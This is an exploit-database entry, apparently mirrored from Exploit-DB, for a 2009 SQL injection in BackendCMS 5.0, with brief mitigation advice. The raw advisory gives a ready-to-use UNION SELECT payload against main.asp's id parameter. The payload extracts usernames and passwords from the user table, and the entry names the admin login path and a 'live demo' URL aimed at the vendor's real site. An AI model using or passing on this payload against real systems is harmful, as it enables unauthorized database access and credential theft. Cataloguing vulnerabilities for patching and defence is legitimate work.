header-logo
Suggest Exploit
vendor:
BackendCMS Version 5.0
by:
AnGeL25dZ
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BackendCMS Version 5.0
Affected Version From: 5
Affected Version To: 5
Patch Exists: YES
Related CWE: N/A
CPE: a:backendcms:backendcms:5.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

BackendCMS Version 5.0 SQl Injection

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable parameter in the HTTP request. This can allow the attacker to gain access to the application database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Input validation should be applied on both client-side and server-side. It is also important to use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

************************************************************
** 	BackendCMS Version 5.0 SQl Injection
************************************************************
**  Prodcut:		BackendCMS Version 5.0  
**  Home   : 		http://www.backendcms.dk/
**  Vunlerability :	SQL Injection 
**  Dork : 		find it yourself
**			
************************************************************
** Discovred by:	AnGeL25dZ
** Contact     : 	angel25dz@gmail.com	
** *********************************************************
** Greetz to :	 ALLAH 
**		 All Members of HackTeach
**		 All Members of http://islam-attack.com
**		 ra3ch and all my friends ...MOC 
** 		 
*************************************************************
******************** SQL Injection **************************
************************************************************* 
** Exploit:  http://[PATH]/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
**  
** Administration Login : http://[path]/admin/
** PS: the number of columns can be different from one site to another
**  
****************************************************************
** Live demo : http://www.backendcms.dk/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user

# milw0rm.com [2009-04-09]

Navigation

Suggest Exploit

Services By CQR